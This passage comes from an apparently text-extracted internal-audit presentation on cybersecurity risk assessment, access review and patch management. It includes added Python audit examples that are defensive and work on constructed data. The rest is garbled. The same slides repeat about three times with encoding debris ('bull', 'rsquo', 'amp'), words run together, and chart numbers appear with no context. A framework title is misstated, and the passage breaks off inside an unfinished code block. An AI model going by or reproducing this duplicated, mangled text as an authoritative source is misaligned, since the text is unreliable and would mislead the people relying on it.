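The 1-10 likelihood/impact scales, the 1-3 asset value weighting, the systems,
threats and control names are all assumptions chosen for illustration."""
from collections import Counter

RISK_THRESHOLD = 100  # the deck's cut-off: "calculated cybersecurity risk > 100"

# Constructed output of the Step 1 asset classification: value weight 1 (low) to 3 (high).
SYSTEMS = {
    "ERP": 3,
    "HR database": 3,
    "Intranet": 1,
}

# Constructed threat model: (system, threat) -> (likelihood 1-10, impact 1-10).
THREATS = {
    ("ERP", "ransomware"): (7, 9),
    ("ERP", "credential theft"): (8, 8),
    ("HR database", "credential theft"): (6, 9),
    ("HR database", "insider misuse"): (4, 7),
    ("Intranet", "ransomware"): (7, 5),
}

# Constructed mapping of each threat to the controls that would mitigate it.
CONTROLS_FOR_THREAT = {
    "ransomware": ["Tested offline backups", "Patch management", "Email filtering"],
    "credential theft": ["Multi-factor authentication", "Privileged account monitoring",
                         "Security awareness training"],
    "insider misuse": ["Least-privilege access review", "Privileged account monitoring"],
}


def risk_score(likelihood, impact, asset_value):
    """Assumed scoring: likelihood x impact x asset value (max 10 x 10 x 3 = 300)."""
    return likelihood * impact * asset_value


def high_risk_pairs(systems, threats, threshold=RISK_THRESHOLD):
    """Steps A and B: score every (system, threat) pair and keep those over the threshold."""
    over = {}
    for (system, threat), (likelihood, impact) in threats.items():
        score = risk_score(likelihood, impact, systems[system])
        if score > threshold:
            over[(system, threat)] = score
    return over


def mitigating_control_counts(systems, threats, controls_for_threat, threshold=RISK_THRESHOLD):
    """Steps C and D: for each high-risk pair list its mitigating controls, then count how
    many high-risk pairs each control reduces. The highest counts go first on the roadmap."""
    counts = Counter()
    for (_system, threat) in high_risk_pairs(systems, threats, threshold):
        counts.update(controls_for_threat[threat])
    return counts


if __name__ == "__main__":
    for pair, score in sorted(high_risk_pairs(SYSTEMS, THREATS).items(), key=lambda kv: -kv[1]):
        print(f"{score:4d}  {pair[0]} / {pair[1]}")
    for control, n in mitigating_control_counts(SYSTEMS, THREATS, CONTROLS_FOR_THREAT).most_common():
        print(f"{n:2d}  {control}")
```

Running the block prints the system/threat pairs scoring over 100 and the ranked control counts; the controls with the highest counts reduce risk for the most critical assets and belong first on the implementation roadmap. Whether a pair crosses the threshold depends entirely on the scales chosen, so agree the scales with management before scoring rather than adjusting them afterwards to produce the list one expects.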
STEP 4 - CYBERSECURITY REPORTING
• Leverage the information gained during the project to provide management with a detailed mapping of the organization's cybersecurity position
• Consider using the COBIT Process Capability Model to map out the CSC framework, which will allow management to begin tracking cybersecurity maturity
COBIT process capability levels:
5 = Optimized
4 = Predictable
3 = Established
2 = Managed
1 = Performed
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 r5, Security and Privacy Controls for Information Systems and Organizations
• NIST Cybersecurity Framework v1.1
• Various other NIST special publications
Center for Internet Security
• CIS Critical Security Controls (formerly the SANS Top 20)
International Organization for Standardization
• ISO/IEC 27001 family: information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). Source: itgovernanceusa.com
According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework and 44% use more than one framework. Source: itgovernanceusa.com
CENTER FOR INTERNET SECURITY – CRITICAL SECURITY CONTROLS
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX: review every system that holds critical data, not only the financially significant ones
• Confirm IT is not using privileged accounts for daily tasks such as browsing the internet or answering email
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing)
• Consider how IT monitors and is alerted on changes to elevated privileges
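The access checks above can be run as data tests rather than interviews: pull an account export from the directory and the group-membership change events from the domain controllers' Security logs. The following Python is an added example, not part of the original presentation; it runs over a constructed directory export and constructed Windows Security event records. The field names, group names, password-policy numbers and account names are assumptions for illustration; the event IDs are the real Windows IDs for group membership changes.

```python
"""Added example, not from the original presentation: two audit tests for the
user and administrator access checks, run over a constructed directory export
and constructed Windows Security event records. Field names, group names,
password-policy numbers and account names are assumptions for illustration."""

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Assumed policy: privileged accounts are held to a stricter standard than standard ones.
POLICY = {
    "standard": {"min_len": 12, "max_age_days": 365},
    "privileged": {"min_len": 16, "max_age_days": 90},
}

# Constructed directory export (one row per account).
ACCOUNTS = [
    {"id": "jsmith", "groups": ["Domain Users"], "mailbox": True, "pwd_len": 12, "pwd_age_days": 60},
    {"id": "jsmith-adm", "groups": ["Domain Users", "Domain Admins"], "mailbox": False, "pwd_len": 20, "pwd_age_days": 45},
    {"id": "bjones-adm", "groups": ["Domain Admins"], "mailbox": True, "pwd_len": 10, "pwd_age_days": 400},
    {"id": "svc-backup", "groups": ["Backup Operators", "Administrators"], "mailbox": False, "pwd_len": 32, "pwd_age_days": 800},
]

# Constructed Windows Security log records. The event IDs are the real ones for group
# membership changes: 4728/4729 global, 4732/4733 local, 4756/4757 universal (add/remove).
EVENTS = [
    {"EventID": 4728, "Time": "2019-03-02T02:14", "TargetUserName": "Domain Admins",
     "MemberName": "CN=tmp-helper,OU=Users,DC=corp,DC=example", "SubjectUserName": "bjones-adm"},
    {"EventID": 4728, "Time": "2019-03-02T09:30", "TargetUserName": "Sales",
     "MemberName": "CN=newhire,OU=Users,DC=corp,DC=example", "SubjectUserName": "helpdesk1"},
    {"EventID": 4729, "Time": "2019-03-02T02:40", "TargetUserName": "Domain Admins",
     "MemberName": "CN=tmp-helper,OU=Users,DC=corp,DC=example", "SubjectUserName": "bjones-adm"},
]

ADD_EVENTS = {4728, 4732, 4756}
REMOVE_EVENTS = {4729, 4733, 4757}


def is_privileged(account, privileged_groups=PRIVILEGED_GROUPS):
    """An account is privileged if it sits in any privileged group, directly or via a service role."""
    return bool(set(account["groups"]) & privileged_groups)


def review_accounts(accounts, policy=POLICY):
    """Least-privilege and password-standard test: returns (account id, finding) pairs.
    A privileged account with a mailbox is flagged because it is being used for daily
    tasks (email, browsing) rather than kept for administration only."""
    findings = []
    for acct in accounts:
        tier = "privileged" if is_privileged(acct) else "standard"
        rule = policy[tier]
        if acct["pwd_len"] < rule["min_len"]:
            findings.append((acct["id"], f"{tier} password shorter than {rule['min_len']} characters"))
        if acct["pwd_age_days"] > rule["max_age_days"]:
            findings.append((acct["id"], f"{tier} password older than {rule['max_age_days']} days"))
        if tier == "privileged" and acct["mailbox"]:
            findings.append((acct["id"], "privileged account has a mailbox: used for daily tasks"))
    return findings


def privileged_group_changes(events, privileged_groups=PRIVILEGED_GROUPS):
    """Monitoring test: every membership change to a privileged group should raise an
    alert that IT can tie back to an approved change ticket."""
    alerts = []
    for ev in events:
        if ev["TargetUserName"] not in privileged_groups:
            continue
        if ev["EventID"] in ADD_EVENTS:
            action = "added to"
        elif ev["EventID"] in REMOVE_EVENTS:
            action = "removed from"
        else:
            continue
        alerts.append(f"{ev['Time']} {ev['MemberName']} {action} {ev['TargetUserName']} by {ev['SubjectUserName']}")
    return alerts


if __name__ == "__main__":
    for account_id, finding in review_accounts(ACCOUNTS):
        print(f"{account_id:12s} {finding}")
    for alert in privileged_group_changes(EVENTS):
        print(alert)
```

On the constructed data the review flags bjones-adm three times and the backup service account once, and the change monitor produces two alerts: an account added to Domain Admins at 02:14 and removed again at 02:40. A short-lived elevation outside a change window with no ticket behind it is exactly the pattern the third and fourth bullets are asking IT to be alerted on. Note that NIST SP 800-63B discourages forced periodic rotation of user-chosen passwords, so the age check is most defensible for shared and service credentials, which should be rotated or vaulted.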
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company
• Determine whether your company conducts random phishing awareness campaigns
• Evaluate your company's overall cybersecurity training and awareness program
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures. Contributing factors:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the devices on their network and therefore are unable to adequately assess their patch management process
• Ensure your IT department is scanning all assets continuously so that newly discovered vulnerabilities are identified quickly
• Validate that the patch management process is effective in ensuring all IT devices are properly updated (patched) to the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched for business reasons, determine whether those risks are formally accepted and tracked by management, and assess whether there are sufficient mitigating controls in place
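Each of the vulnerability management checks above has a data test behind it: reconcile the asset inventory against what the scanner actually saw, age every open finding against the date its patch became available, and match what is still open against the risk-acceptance register. The following Python is an added example, not part of the original presentation; it runs over a constructed scan export, a constructed asset inventory and a constructed risk-acceptance register. Asset and finding names are placeholders, and the dates and the one-year cut-off are assumptions.

```python
"""Added example, not from the original presentation: three audit tests for the
vulnerability management checks, run over a constructed scan export, a constructed
asset inventory and a constructed risk-acceptance register. Asset and finding names
are placeholders; the dates and the one-year cut-off are assumptions."""
from datetime import date

AS_OF = date(2019, 4, 1)   # assumed audit date
MAX_PATCH_AGE_DAYS = 365   # the deck's point: exploited flaws are mostly over a year past their patch

# Constructed scan export: one row per (asset, finding); patch_released is the vendor's fix date.
SCAN = [
    {"asset": "web-01", "internet_facing": True, "finding": "finding-001", "patch_released": date(2017, 6, 1), "fixed": False},
    {"asset": "web-01", "internet_facing": True, "finding": "finding-002", "patch_released": date(2019, 3, 1), "fixed": False},
    {"asset": "erp-db", "internet_facing": False, "finding": "finding-003", "patch_released": date(2016, 1, 1), "fixed": False},
    {"asset": "hr-app", "internet_facing": False, "finding": "finding-004", "patch_released": date(2018, 1, 1), "fixed": True},
    {"asset": "ws-0421", "internet_facing": False, "finding": "finding-005", "patch_released": date(2017, 9, 1), "fixed": False},
]

# Constructed asset inventory (CMDB). Reconciling it against what the scanner actually saw is
# the test for "we do not know all of the devices on our network".
INVENTORY = {"web-01", "erp-db", "hr-app", "fw-edge"}

# Constructed risk-acceptance register for findings that cannot be patched for business reasons.
RISK_ACCEPTANCES = [
    {"asset": "erp-db", "finding": "finding-003", "approved_by": "CIO", "expires": date(2019, 12, 31),
     "mitigating_control": "database segmented from user VLANs; vendor patch breaks ERP module"},
]


def reconcile_inventory(scan, inventory):
    """Devices the scanner never touched, and devices it found that nobody inventoried."""
    scanned = {row["asset"] for row in scan}
    return {"in_inventory_not_scanned": sorted(inventory - scanned),
            "scanned_not_in_inventory": sorted(scanned - inventory)}


def stale_unpatched(scan, as_of=AS_OF, max_age_days=MAX_PATCH_AGE_DAYS):
    """Open findings whose patch has been available longer than the cut-off,
    internet-facing assets first, then oldest patch first."""
    stale = []
    for row in scan:
        age = (as_of - row["patch_released"]).days
        if not row["fixed"] and age > max_age_days:
            stale.append({**row, "patch_age_days": age})
    return sorted(stale, key=lambda r: (not r["internet_facing"], -r["patch_age_days"]))


def unaccepted_exceptions(stale, acceptances, as_of=AS_OF):
    """Stale findings with no current, approved risk acceptance that names a mitigating control."""
    covered = {(a["asset"], a["finding"]) for a in acceptances
               if a["approved_by"] and a["mitigating_control"] and a["expires"] >= as_of}
    return [r for r in stale if (r["asset"], r["finding"]) not in covered]


if __name__ == "__main__":
    print(reconcile_inventory(SCAN, INVENTORY))
    stale = stale_unpatched(SCAN)
    for r in stale:
        print(f"{r['asset']:8s} {r['finding']} patch available {r['patch_age_days']} days")
    for r in unaccepted_exceptions(stale, RISK_ACCEPTANCES):
        print(f"NO RISK ACCEPTANCE: {r['asset']} {r['finding']}")
```

On the constructed data the reconciliation shows one inventoried device the scanner never reached (fw-edge) and one scanned host nobody inventoried (ws-0421); both are findings in their own right, because a device outside the inventory is outside the patch process. Three open findings are more than a year past their patch; the ERP database one has a current, approved acceptance with a named mitigating control, the other two do not and go to management as unaccepted risk. An acceptance without an expiry date, an approver or a compensating control should be treated as no acceptance at all.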
CYBERSECURITY – SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Understand your company's fundamental process around patch management and focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, character requirements and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and that backups are properly segregated (isolated so that an attacker with access to production systems cannot reach them)
• Understand the coverage and terms of your company's cyber insurance policy
• Assess the requirement for multi-factor authentication
ANATOMY OF AN ATTACK
QUESTIONS
David Losacco, Principal, mobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett & Associates, stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 r5 - Recommended Security Controls for Federal Information Systems and Organizations
• NIST Cyber Security Framework v1.1
• Various other NIST special publications
Center for Internet Security
• Critical Security Controls (formerly SANS Top 20)
International Organization for Standardization
• ISO 27001 family - Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). - Source: itgovernanceusa.com
According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework in their organization, and 44% use more than one framework. - Source: itgovernanceusa.com
CENTER FOR INTERNET SECURITY - CRITICAL SECURITY CONTROLS
CYBERSECURITY - WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX.
• Confirm IT is not using privileged accounts for daily tasks such as browsing the internet or answering email.
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing).
• Consider how IT monitors and is alerted on changes to elevated privileges.
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.
• Determine whether your company conducts random phishing awareness training campaigns.
• Evaluate your company's overall cybersecurity training and awareness program.
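An added example, not part of the presentation, of the kind of monitoring the access bullets above ask Internal Audit to look for: a small Python check that reads constructed Windows Security log lines and flags additions to privileged groups, plus interactive logons by accounts designated as admin-only. The log lines, account and group names and the PRIVILEGED_ACCOUNTS set are invented sample data; event IDs 4728/4732 (member added to a global/local security group), 4624 (successful logon) and logon types 2/10 (console/Remote Desktop) are the real Windows values.

```python
"""Added example (not from the presentation): detection logic for the
"monitor and alert on changes to elevated privileges" and "no privileged
accounts for daily tasks" points above. Log lines, account names, group
names and PRIVILEGED_ACCOUNTS are constructed sample data; the Windows event
IDs and logon types are the real ones."""
import re

# Groups whose membership changes should raise an alert (assumption: tailor per company).
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators", "Schema Admins"}
# Accounts designated as privileged and therefore not for day-to-day use (constructed).
PRIVILEGED_ACCOUNTS = {"CORP\\jsmith-adm", "CORP\\svc-backup"}

# Constructed Security log lines in a key=value style as a log aggregator might emit them.
SAMPLE_LOG = """\
2019-03-04T08:12:01Z EventID=4728 Subject=CORP\\jsmith-adm Member=CORP\\svc-backup Group="Domain Admins"
2019-03-04T08:15:44Z EventID=4624 Subject=CORP\\jsmith-adm LogonType=2
2019-03-04T08:20:03Z EventID=4624 Subject=CORP\\jsmith LogonType=2
2019-03-04T09:02:10Z EventID=4732 Subject=CORP\\helpdesk1 Member=CORP\\tjones Group="Remote Desktop Users"
2019-03-04T09:40:27Z EventID=4732 Subject=CORP\\helpdesk1 Member=CORP\\tjones Group="Administrators"
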